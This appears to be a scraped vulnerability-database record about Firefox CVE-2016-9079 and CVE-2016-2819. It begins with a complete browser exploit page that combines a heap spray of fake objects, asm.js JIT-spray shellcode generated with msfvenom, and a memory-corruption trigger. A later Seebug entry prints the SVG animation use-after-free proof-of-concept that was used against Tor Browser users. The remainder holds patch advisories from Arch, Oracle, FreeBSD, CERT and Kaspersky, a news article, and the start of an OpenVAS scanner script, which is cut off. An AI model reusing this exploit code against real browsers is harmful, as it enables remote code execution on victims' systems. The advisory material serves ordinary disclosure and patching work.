\r\n Mar. 13, 2018\r\n \r\n-->\r\n \r\n<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>\r\n<head>\r\n<meta charset=UTF-8 />\r\n<script>\r\n\"use strict\"\r\n \r\nvar Exploit = function(){\r\n this.asmjs = new Asmjs()\r\n this.heap = new Heap()\r\n}\r\n \r\nExploit.prototype.go = function(){\r\n /* target address of fake node object */\r\n var node_target_addr = 0x5a500000 \r\n \r\n /* target address of asm.js float pool payload*/\r\n var target_eip = 0x20200b58\r\n \r\n /* spray asm.js float constant pools */\r\n this.asmjs.spray_float_payload(0x1000)\r\n \r\n /* spray fake Node objects */\r\n this.heap.spray(node_target_addr, target_eip)\r\n \r\n /* go! */\r\n this.trigger_vuln(node_target_addr)\r\n};\r\n \r\n \r\nExploit.prototype.trigger_vuln = function(node_ptr){\r\n document.body.innerHTML = '<table><svg><div id=\"BBBB\">'\r\n this.heap.gc()\r\n var a = new Array() \r\n for (var i=0; i < 0x10100; i++){\r\n /* array element (Node object ptr) control with integer underflow */\r\n a[i] = new Uint32Array(0x100/4)\r\n for (var j=0; j<0x100/4; j++)\r\n a[i][j] = node_ptr \r\n }\r\n \r\n /* original crashing testcase\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'\r\n */\r\n \r\n /* easier to exploit codepath */\r\n document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'\r\n \r\n window.location.reload()\r\n};\r\n \r\n \r\nvar Asmjs = function(){};\r\n \r\nAsmjs.prototype.asm_js_module = function(stdlib, ffi){\r\n \"use asm\"\r\n var foo = ffi.foo\r\n function payload(){\r\n var val = 0.0\r\n /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/\r\n val = +foo(\r\n // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py\r\n -1.587865768352248e-263,\r\n -8.692422460804815e-255,\r\n 7.529882109376901e-114,\r\n 2.0120602207293977e-16,\r\n 3.7204662687249914e-242,\r\n 4.351158092040946e+89,\r\n 2.284741716118451e+270,\r\n 7.620699014501263e-153,\r\n 5.996021286047645e+44,\r\n -5.981935902612295e-92,\r\n 6.23540918304361e+259,\r\n 1.9227873281657598e+256,\r\n 2.0672493951546363e+187,\r\n -6.971032919585734e+91,\r\n 5.651413300798281e-134,\r\n -1.9040061366251406e+305,\r\n -1.2687640718807038e-241,\r\n 9.697849844423e-310,\r\n -2.0571400761625145e+306,\r\n -1.1777948610587587e-123,\r\n 2.708909852013898e+289,\r\n 3.591750823735296e+37,\r\n -1.7960516725035723e+106,\r\n 6.326776523166028e+180\r\n )\r\n return +val;\r\n }\r\n return payload\r\n};\r\n \r\nAsmjs.prototype.spray_float_payload = function(regions){\r\n this.modules = new Array(regions).fill(null).map(\r\n region => this.asm_js_module(window, {foo: () => 0})\r\n )\r\n};\r\n \r\nvar Heap = function(target_addr, eip){\r\n this.node_heap = []\r\n};\r\n \r\n \r\nHeap.prototype.spray = function(node_target_addr, target_eip){\r\n var junk = 0x13371337\r\n var current_address = 0x20000000\r\n var block_size = 0x1000000\r\n while(current_address < node_target_addr){\r\n var fake_objects = new Uint32Array(block_size/4 - 0x100)\r\n for (var offset = 0; offset < block_size; offset += 0x100000){\r\n /* target Node object needed to control EIP */\r\n fake_objects[offset/4 + 0x00/4] = 0x29 \r\n fake_objects[offset/4 + 0x0c/4] = 3\r\n fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18\r\n fake_objects[offset/4 + 0x18/4] = 1\r\n fake_objects[offset/4 + 0x1c/4] = junk\r\n fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24\r\n fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28\r\n fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c\r\n fake_objects[offset/4 + 0x2c/4] = target_eip \r\n }\r\n this.node_heap.push(fake_objects)\r\n current_address += block_size\r\n }\r\n};\r\n \r\nHeap.prototype.gc = function(){\r\n for (var i=0; i<=10; i++)\r\n var x = new ArrayBuffer(0x1000000)\r\n};\r\n \r\n</script>\r\n<head>\r\n<body onload='exploit = new Exploit(); exploit.go()' />\n\n# 0day.today [2018-04-01] #", "sourceHref": "https://0day.today/exploit/30002", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:10", "description": "Arch Linux Security Advisory ASA-201612-2\n=========================================\n\nSeverity: Critical\nDate : 2016-12-01\nCVE-ID : CVE-2016-9079\nPackage : thunderbird\nType : arbitrary code execution\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package thunderbird before version 45.5.1-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 45.5.1-1.\n\n# pacman -Syu \"thunderbird>=45.5.1-1\"\n\nThe problem has been fixed upstream in version 45.5.1.\n\nWorkaround\n==========\n\nNone\n\nDescription\n===========\n\nA use-after-free vulnerability has been discovered in the SVG Animation\ncomponent of Firefox, leading to arbitrary code execution.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by embedding a\ncrafted SVG image in content displayed by Thunderbird.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/known-vulnerabilities/thunderbird/#thunderbird45.5.1\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\nhttps://access.redhat.com/security/cve/CVE-2016-9079", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T00:00:00", "type": "archlinux", "title": "[ASA-201612-2] thunderbird: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T00:00:00", "id": "ASA-201612-2", "href": "https://security.archlinux.org/ASA-201612-2", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:34:11", "description": "Arch Linux Security Advisory ASA-201612-1\n=========================================\n\nSeverity: Critical\nDate : 2016-12-01\nCVE-ID : CVE-2016-9078 CVE-2016-9079\nPackage : firefox\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package firefox before version 50.0.2-1 is vulnerable to multiple\nissues including arbitrary code execution and same-origin policy\nbypass.\n\nResolution\n==========\n\nUpgrade to 50.0.2-1.\n\n# pacman -Syu \"firefox>=50.0.2-1\"\n\nThe problems have been fixed upstream in version 50.0.2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-9078 (same-origin policy bypass)\n\nRedirection from an HTTP connection to a data: URL assigns the\nreferring site's origin to the data: URL in some circumstances. This\ncan result in same-origin violations against a domain if it loads\nresources from malicious sites. Cross-origin setting of cookies has\nbeen demonstrated without the ability to read them.\n\n- CVE-2016-9079 (arbitrary code execution)\n\nA use-after-free vulnerability has been discovered in the SVG Animation\ncomponent of Firefox, leading to arbitrary code execution.\n\nImpact\n======\n\nA remote attacker can bypass the same-origin policy and execute\narbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2016-91/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2016-92/\nhttps://access.redhat.com/security/cve/CVE-2016-9078\nhttps://access.redhat.com/security/cve/CVE-2016-9079", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T00:00:00", "type": "archlinux", "title": "[ASA-201612-1] firefox: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9078", "CVE-2016-9079"], "modified": "2016-12-01T00:00:00", "id": "ASA-201612-1", "href": "https://security.archlinux.org/ASA-201612-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2021-09-28T17:51:17", "description": "### Overview\n\nMozilla Firefox contains a use-after-free vulnerability in the SVG animation functionality, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nMozilla Firefox supports SVG animation through the use of [SMIL](<https://developer.mozilla.org/en-US/docs/Web/SVG/SVG_animation_with_SMIL>). The nsSMILTimeContainer object contains a use-after-free vulnerability, which can allow arbitrary code execution.\n\nExploit code for this vulnerability is publicly available, which specifically targets the Tor Browser Bundle. \n \n--- \n \n### Impact\n\nBy convincing a use to view specially-crafted web content, a remote-unauthenticated attacker may be able to execute arbitrary code on an affected system. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nThis issue is addressed in [Tor Browser 6.0.7](<https://blog.torproject.org/blog/tor-browser-607-released>) and [Mozilla Firefox versions 50.0.2 and 45.5.1 ESR, as well as Thunderbird 45.5.1](<https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/>). \n \n--- \n \n**Disable JavaScript** \n \nThis vulnerability can be mitigated by disabling JavaScript. This can be accomplished through use of the [NoScript Firefox add-on](<https://addons.mozilla.org/firefox/addon/noscript/>). \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this and other vulnerabilities. Limited testing has shown that the following mitigations present in EMET 4.0 and later blog the public exploit for this vulnerability:\n\n * StackPivot\n * EAF\n * Caller \n--- \n \n### Vendor Information\n\n791496\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Mozilla Affected\n\nUpdated: November 30, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/>\n\n### Tor Affected\n\nUpdated: November 30, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blog.torproject.org/blog/tor-browser-607-released>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.5 | E:H/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/>\n * <https://hg.mozilla.org/mozilla-central/rev/adcc39e3cad0>\n * <https://bugzilla.mozilla.org/show_bug.cgi?id=1321066>\n * <https://blog.gdatasoftware.com/2016/11/29346-firefox-0-day-targeting-tor-users>\n * <http://support.microsoft.com/kb/2458544>\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-9079](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-9079>) \n---|--- \n**Date Public:** | 2016-11-29 \n**Date First Published:** | 2016-11-30 \n**Date Last Updated: ** | 2016-12-02 19:56 UTC \n**Document Revision: ** | 16 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-30T00:00:00", "type": "cert", "title": "Mozilla Firefox SVG animation nsSMILTimeContainer use-after-free vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-02T19:56:00", "id": "VU:791496", "href": "https://www.kb.cert.org/vuls/id/791496", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:25:04", "description": "[45.5.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[45.5.1-1]\n- Update to 45.5.1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-05T00:00:00", "type": "oraclelinux", "title": "thunderbird security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-05T00:00:00", "id": "ELSA-2016-2850", "href": "http://linux.oracle.com/errata/ELSA-2016-2850.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-07-28T14:24:48", "description": "[45.5.1-1.0.1]\n- Add firefox-oracle-default-prefs.js and firefox-oracle-default-bookmarks.html\n and remove the corresponding Red Hat files\n[45.5.1-1]\n- Update to 45.5.1 ESR", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-01T00:00:00", "type": "oraclelinux", "title": "firefox security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T00:00:00", "id": "ELSA-2016-2843", "href": "http://linux.oracle.com/errata/ELSA-2016-2843.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "thn": [{"lastseen": "2018-01-27T09:17:58", "description": "[](<https://4.bp.blogspot.com/-y-ryH0jTHTM/WD_d5qKom8I/AAAAAAAAqa0/OMUhYRtHCSgy9Mu9z7-mGYbNVNyoeY6gwCLcB/s1600/firefox-tor-download.png>)\n\nThe [critical Firefox vulnerability](<https://thehackernews.com/2016/11/firefox-tor-exploit.html>) being actively exploited in the wild to unmask Tor users has been patched with the release of new browser updates. \n \nBoth Mozilla and Tor Project has patched the vulnerability that allows attackers to remotely execute malicious code on Windows operating system via memory corruption vulnerability in Firefox web browser. \n \nTor Browser Bundle is a repackaged version of the open-source Mozilla Firefox browser that runs connections through the Tor anonymizing network configured to hide its user's public IP address. \n \nHowever, the [exploit code](<https://thehackernews.com/2016/11/firefox-tor-exploit.html>) released by an unnamed online user was currently being exploited against Tor Browser users to leak the potentially identifying information of Tor users. \n\n\n> \"The security flaw responsible for this urgent release is already actively exploited on Windows systems,\" an official of the anonymity network wrote in an [advisory](<https://blog.torproject.org/blog/tor-browser-607-released>) published on Wednesday. \n\n> \"Even though there is currently...no similar exploit for OS X or Linux users available, the underlying [Firefox] bug affects those platforms as well. Thus we strongly recommend that all users apply the update to their Tor Browser immediately.\"\n\nSoon after the Tor Project released the updated version of its browser, Mozilla also posted a [blog post](<https://blog.mozilla.org/security/2016/11/30/fixing-an-svg-animation-vulnerability/>) that said the company has also released an updated version of Firefox that patched the underlying vulnerability. \n \nThe vulnerability, assigned CVE-2016-9079 and rated critical, also [affects](<https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/>) Mozilla's Thunderbird e-mail application and the Firefox Extended Support Release (ESR) version used by the Tor Browser. \n \nThe attack code exploiting the underlying vulnerability initially circulated Tuesday on a Tor discussion list by an admin of the SIGAINT privacy-oriented public email service. \n\n\n> \"The exploit took advantage of a bug in Firefox to allow the attacker to execute arbitrary code on the targeted system by having the victim load a web page containing malicious JavaScript and SVG code,\" said Mozilla security official Daniel Veditz. \n\n> \"It used this capability to collect the IP and MAC address of the targeted system and report them back to a central server. While the payload of the exploit would only work on Windows, the vulnerability exists on Mac OS and Linux as well.\"\n\nFirefox and Tor users are strongly recommended to update their web browsers to the latest [Firefox version 50.0.2](<https://www.mozilla.org/en-US/firefox/50.0.2/releasenotes/>) and [Tor Browser 6.0.7](<https://www.torproject.org/download/download-easy.html>), respectively, as soon as possible. \n \nMeanwhile, people using both Tor and mainstream versions of Firefox can set the Firefox security slider to \"**High**\" in order to protect themselves from the attack. \n \nDoing so would render the exploit moot, _Georg Koppen_, Tor Browser Team Lead, told The Hacker News in an email, although the setting will prevent many websites from working as expected. \n\n\n> \"Apart from that we are currently working on sandboxing techniques that have [the] potential to mitigate this kind of attack,\" Koppen added. \"They are, alas, not ready for the stable series yet. We plan to ship prototypes with the next planned alpha releases.\"\n\nFor more details about the critical Firefox vulnerability, you can head on to our previous article, [Firefox Zero-Day Exploit to Unmask Tor Users Released Online](<https://thehackernews.com/2016/11/firefox-tor-exploit.html>).\n", "cvss3": {}, "published": "2016-11-30T21:32:00", "type": "thn", "title": "UPDATE Firefox and Tor to Patch Critical Zero-day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-01T08:32:38", "id": "THN:67A8D3C888F0DA741B9FCF426B24B639", "href": "https://thehackernews.com/2016/11/firefox-tor-update.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2017-11-19T12:02:40", "description": "No description provided by source.", "cvss3": {}, "published": "2016-11-30T00:00:00", "type": "seebug", "title": "New Firefox/Tor Browser 0-day vulnerability \uff08CVE-2016-9079\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2016-11-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92560", "id": "SSV:92560", "sourceData": "\n <!-- \u76f8\u5173\u7248\u672cpoc\u53ef\u5728\u6b64\u4e0b\u8f7d https://bugzilla.mozilla.org/show_bug.cgi?id=1321066 -->\r\n<!-- \u6765\u81ea [tor-talk] \u53ef\u5728\u6b64\u4e0b\u8f7d\uff1ahttps://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html\uff0c\u53ef\u88ab\u7528\u6765\u653b\u51fb\u5229\u7528 Tor \u6d4f\u89c8\u5668\u4f7f\u7528\u7684 Firefox\u7248\u672c -->\r\n<script>\r\nvar worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage(\"one\");postMessage(\"two\");};');\r\nworker.postMessage(\"zero\");\r\nvar svgns = 'http://www.w3.org/2000/svg';\r\nworker.onmessage = function(e) {containerA.pauseAnimations();}\r\nvar craftDOM = function()\r\n{\r\n containerA = document.createElementNS(svgns, 'svg')\r\n var containerB = document.createElementNS(svgns, 'svg');\r\n animateX = document.createElementNS(svgns, 'animate')\r\n var animateA = document.createElementNS(svgns, 'animate')\r\n var animateB = document.createElementNS(svgns, 'animate')\r\n var animateC = document.createElementNS(svgns, 'animate')\r\n var idA = \"ia\";\r\n var idC = \"ic\";\r\n animateA.setAttribute('id', idA);\r\n animateA.setAttribute('end', '50s');\r\n animateB.setAttribute('begin', '60s');\r\n animateB.setAttribute('end', idC + '.end');\r\n animateC.setAttribute('id', idC);\r\n animateC.setAttribute('end', idA + '.end');\r\n containerA.appendChild(animateX)\r\n containerA.appendChild(animateA)\r\n containerA.appendChild(animateB)\r\n containerB.appendChild(animateC)\r\n document.body.appendChild(containerA);\r\n document.body.appendChild(containerB);\r\n}\r\nwindow.onload = craftDOM;\r\n</script>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92560", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-02-08T16:09:31", "description": "### *Detect date*:\n11/30/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nA use-after-free vulnerability was found in Mozilla Firefox before 50.0.2, Mozilla Firefox ESR before 45.5.1 and Mozilla Thunderbird before 45.5.1. Exploiting this vulnerability can possibly lead to a denial of service and also an execution of arbitrary code. This vulnerability can be exploited remotely via a SVG Animation.\n\n### *Affected products*:\nMozilla Firefox before 50.0.2 \nMozilla Firefox ESR before 45.5.1 \nMozilla Thunderbird before 45.5.1\n\n### *Solution*:\nUpdate to the latest versions \n[Download Mozilla Firefox](<https://www.mozilla.org/firefox/new/>) \n[Download Mozilla Thunderbird](<https://www.mozilla.org/thunderbird/>) \n[Mozilla Firefox ESR](<https://www.mozilla.org/firefox/organizations/all/>)\n\n### *Original advisories*:\n[Mozilla Foundation Security Advisory 2016-92](<https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2016-9079](<https://vulners.com/cve/CVE-2016-9079>)5.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-30T00:00:00", "type": "kaspersky", "title": "KLA10906 Use-after-free vulnerability in Mozilla products", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2020-06-18T00:00:00", "id": "KLA10906", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10906/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Mozilla Foundation reports:\n\nA use-after-free vulnerability in SVG Animation has been\n\t discovered. An exploit built on this vulnerability has been\n\t discovered in the wild targeting Firefox and Tor Browser\n\t users on Windows.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-30T00:00:00", "type": "freebsd", "title": "Mozilla -- SVG Animation Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079"], "modified": "2016-12-16T00:00:00", "id": "18F39FB6-7400-4063-ACAF-0806E92C094F", "href": "https://vuxml.freebsd.org/freebsd/18f39fb6-7400-4063-acaf-0806e92c094f.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:07", "description": "A use-after-free vulnerability in the\nSVG Animation was discovered in the Mozilla Firefox web browser, allowing a\nremote attacker to cause a denial of service (application crash) or execute\narbitrary code, if a user is tricked into opening a specially crafted website.", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3728-1 (firefox-esr - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703728", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703728", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3728.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3728-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703728\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-9079\");\n script_name(\"Debian Security Advisory DSA 3728-1 (firefox-esr - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 00:00:00 +0100 (Thu, 01 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n 